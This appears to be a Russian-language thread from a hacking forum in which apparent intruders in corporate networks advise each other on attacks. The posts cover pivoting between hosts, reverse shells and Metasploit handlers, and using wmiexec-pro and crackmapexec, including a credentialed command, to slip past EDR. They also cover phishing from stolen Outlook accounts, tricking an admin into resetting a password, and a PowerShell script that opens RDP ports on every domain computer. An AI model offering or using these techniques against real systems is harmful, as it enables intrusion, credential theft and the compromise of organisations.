• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Перейти к новому Отслеживать
user_47 сказал(а):
первая тачка твой комп в сетке ВПН видит? Если видит, можно на своей поднять сервак какой либо для файлообмена и залить файл. Тут встаёт вопрос: у первой машины какая ось стоит? Может там по умлчанию есть в системе что то для файлообмена.

На вскидку я попробовал бы вариант с netcat`ом.
Поднял у себя веб сервак библиотекой питона для скачки netcat. Приконектился с первой машины через браузер или curl и скачал файл. А дальше передал файл.
Но маловато деталей всё таки (какая ось, какой АВ). Видимо у тебя там ситуация очень сложная)
Первая тачка мой комп не видит(
А вот по подводу netcat, действительно можно что нибудь попробовать, win 2019, мб попробую как нибудь порты открыть еще, но вот ни браузер ни curl к сожалению не работают, но спасибо, теперь есть несколько мыслей по поводу открывания портов для того же ssh(хотя это будет сложно сделать с учеткой юзера) у себя и с помощью танцев с бубном как-то коннектится)
 
Grates сказал(а):
Первая тачка мой комп не видит(
А вот по подводу netcat, действительно можно что нибудь попробовать, win 2019, мб попробую как нибудь порты открыть еще, но вот ни браузер ни curl к сожалению не работают, но спасибо, теперь есть несколько мыслей по поводу открывания портов для того же ssh(хотя это будет сложно сделать с учеткой юзера) у себя и с помощью танцев с бубном как-то коннектится)
Проверь пингуется ли вторая машина по впн, если пингуется, то ты можешь попробовать локальным админом открыть smb протокол, тогда у тебя будет доступ к ней по впн и ты сможешь использовать утилки типа wmiexec-pro, cme etc
 
kamzzzzz сказал(а):
Проверь пингуется ли вторая машина по впн, если пингуется, то ты можешь попробовать локальным админом открыть smb протокол, тогда у тебя будет доступ к ней по впн и ты сможешь использовать утилки типа wmiexec-pro, cme etc
к сожалению не пингуется, а так smb протокол на второй машине уже открыт, как и ssh, на второй машине нет проблем с тем что от туда я не смогу вытащить файл, основная проблема скорее в том что на вторую машину с локал админом я могу попасть только через первый хост с локал юзером и отсутсвием какой либо свзязи с основной тачкой, и открытыми портами 139, 3389 и все(
 
Grates сказал(а):
к сожалению не пингуется, а так smb протокол на второй машине уже открыт, как и ssh, на второй машине нет проблем с тем что от туда я не смогу вытащить файл, основная проблема скорее в том что на вторую машину с локал админом я могу попасть только через первый хост с локал юзером и отсутсвием какой либо свзязи с основной тачкой, и открытыми портами 139, 3389 и все(
1. Тебе надо пробросить прокси на первую, и по проксичейну все будет. Ищи решения на гитхабе
2. wmiexec-pro (github) работает лучше всех по 139 порту
 
Grates сказал(а):
Первая тачка мой комп не видит(
А вот по подводу netcat, действительно можно что нибудь попробовать, win 2019, мб попробую как нибудь порты открыть еще, но вот ни браузер ни curl к сожалению не работают, но спасибо, теперь есть несколько мыслей по поводу открывания портов для того же ssh(хотя это будет сложно сделать с учеткой юзера) у себя и с помощью танцев с бубном как-то коннектится)
Если у тебя получается по SSH какие то манипуляции проводить, то поднимай так же на своей тачке сервак SSH и заливай оттуда.

Если нет дополнительных АВ, можно попробовать запустить простенький реверсшел для конекта на тот же NC или сразу хандлер metasploit`а.
Кроме реверса может получиться бинд также поднять, если даст порт открыть.
Посмотри что то удобное тут: https://www.revshells[.]com
Подходящий код скрипта может получиться прямо так набрать через РДП в окошке блокнота.
Можно попробовать поэкспериментировать с разными протоколами (голый tcp, https, dns, icmp например).
Обычно на серваках АВ не запускают, поэтому попроще должно быть с экспериментами.

Как то же ты подключился к этому компу. Значит связь какая то есть.
 
Whisper сказал(а):
Чем лучше импакета?
Лучше стартует по EDR типа сентинела
Проверял на двух компах импакет и вмиэкзек-про на сентинеле, на импакете убил запуск софта легитного за удаленный пуск, на прошке запустил не пискнул
Плюс иногда смбшные плюшки импакета не дают: а он дает, хз с чем связано
 
wmiexec, не про, очень часто юзаю для запуска удалённого шелла локально и других задач, так как аверы на него, если локально юзать молчат, а вот на cme ругань аверов есть. За про не знал. Затестю по надобности
 
kamzzzzz сказал(а):
Лучше стартует по EDR типа сентинела
Проверял на двух компах импакет и вмиэкзек-про на сентинеле, на импакете убил запуск софта легитного за удаленный пуск, на прошке запустил не пискнул
Плюс иногда смбшные плюшки импакета не дают: а он дает, хз с чем связано
Мельком глянул, базис импакет. Позже гляну подробнее что поменяли в самой схеме.
Может разница касаеться только шелл режима.
 
Whisper сказал(а):
Мельком глянул, базис импакет. Позже гляну подробнее что поменяли в самой схеме.
Может разница касаеться только шелл режима.
Да они все по сути модифицированые импакеты, никто ничего не предумал другого, база одна)
 
cash-in сказал(а):
Парни подскажите плиз, как из 10к тачек найти именно тот комп, который имеет доступ к внешнему интернету?
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'ping 8.8.8.8 -n 1'
 
Прошу совета.

Есть пару акков от коррпоративного аутлука. Через них так же могу попасть в OneDrive и office365. Подскажите дальнейшие вектора.

Сейчас в голову приходит только рассылка с вложением PDF`ным. Но может ещё куда то стоит посмотреть?
 
user_47 сказал(а):
Прошу совета.

Есть пару акков от коррпоративного аутлука. Через них так же могу попасть в OneDrive и office365. Подскажите дальнейшие вектора.

Сейчас в голову приходит только рассылка с вложением PDF`ным. Но может ещё куда то стоит посмотреть?
Да нет вариантов больше особо, поискать в почтах анидески могут быть или пароли меняют иногда внутри корп рассылают юзерам
Можешь попытаться админа развести на сброс пароля учетки доменной, ну при условии что сеть есть
 
Нужна ваша помощь!!

Подскажите скрипт для PowerShell , чтобы можно было включать одновременно порты на всех хостах корп сети

Вот пробовал такой -но что-то не пошло
Write-host "Enter new RDP port number: " -ForegroundColor Yellow -NoNewline;$RDPPort = Read-Host
$PCs = Get-ADComputer -Filter *
Foreach ($PC in $PCs) {
Invoke-Command -ComputerName $PC.Name -ScriptBlock {
param ($RDPPort)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\" -Name PortNumber -Value $RDPPort
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
Restart-Service termservice -force
}
}


буду очень благодарен
 
Псехеком по списку айпи раскидать командой как вариант. Есть такой скрипт, но не у пк сейчас. Как ты хочеш, чтобы он работал этот скрипт, если в скрипте нету номера порта. Ты читал скрипт и где в нем нужно номер порта ввести..
 
Eleven сказал(а):
Псехеком по списку айпи раскидать командой как вариант. Есть такой скрипт, но не у пк сейчас. Как ты хочеш, чтобы он работал этот скрипт, если в скрипте нету номера порта. Ты читал скрипт и где в нем нужно номер порта ввести..
порт вставляется после веденной команды

псехеком это понятно,но опять же я не знаю как это делать сразу на всех хостах
и псехек не всегда срабатывает
 
krab сказал(а):
Нужна ваша помощь!!

Подскажите скрипт для PowerShell , чтобы можно было включать одновременно порты на всех хостах корп сети

Вот пробовал такой -но что-то не пошло
Write-host "Enter new RDP port number: " -ForegroundColor Yellow -NoNewline;$RDPPort = Read-Host
$PCs = Get-ADComputer -Filter *
Foreach ($PC in $PCs) {
Invoke-Command -ComputerName $PC.Name -ScriptBlock {
param ($RDPPort)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\" -Name PortNumber -Value $RDPPort
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
Restart-Service termservice -force
}
}


буду очень благодарен
Скрытый контент для пользователей: krab.
 
krab сказал(а):
порт вставляется после веденной команды

псехеком это понятно,но опять же я не знаю как это делать сразу на всех хостах
и псехек не всегда срабатывает
Чуть подправил, но ты не обьяснил в чем именно проблема, по идее все должно работать у тебя, но дал слишком мало информации, возможно дело не в скрипте, ошибки то разные бывают(нормальны ли DA, мб конфигурация ad не позволяет, WinRM, ну или просто брандмауэр или ав блочат)
Write-Host "Enter new RDP port number: " -ForegroundColor Yellow -NoNewline
$RDPPort = Read-Host

if (-not $RDPPort -match '^\d+$' -or [int]$RDPPort -lt 1 -or [int]$RDPPort -gt 65535) {
Write-Host "Invalid port number. Please enter a number between 1 and 65535." -ForegroundColor Red
exit
}

$PCs = Get-ADComputer -Filter *

foreach ($PC in $PCs) {
Invoke-Command -ComputerName $PC.Name -ScriptBlock {
param ($RDPPort)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\" -Name PortNumber -Value $RDPPort
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
Restart-Service termservice -force
} -ArgumentList $RDPPort
}

Надеюсь все получится
 
Grates сказал(а):
Чуть подправил, но ты не обьяснил в чем именно проблема, по идее все должно работать у тебя, но дал слишком мало информации, возможно дело не в скрипте, ошибки то разные бывают(нормальны ли DA, мб конфигурация ad не позволяет, WinRM, ну или просто брандмауэр или ав блочат)
Write-Host "Enter new RDP port number: " -ForegroundColor Yellow -NoNewline
$RDPPort = Read-Host

if (-not $RDPPort -match '^\d+$' -or [int]$RDPPort -lt 1 -or [int]$RDPPort -gt 65535) {
Write-Host "Invalid port number. Please enter a number between 1 and 65535." -ForegroundColor Red
exit
}

$PCs = Get-ADComputer -Filter *

foreach ($PC in $PCs) {
Invoke-Command -ComputerName $PC.Name -ScriptBlock {
param ($RDPPort)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\" -Name PortNumber -Value $RDPPort
New-NetFirewallRule -DisplayName "New RDP Port $RDPPort" -Direction Inbound –LocalPort $RDPPort -Protocol TCP -Action Allow
Restart-Service termservice -force
} -ArgumentList $RDPPort
}

Надеюсь все получится
проблема в том что он не включает порты 3389 на хостах все в сетке
а после того как ввожу этот скрипт ,он тупо выбрасывает меня с ДА и там отключает порт 3389

по поводу это скрипта что вы дали выше,вообще ничего не дает,закрыват окно и все
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх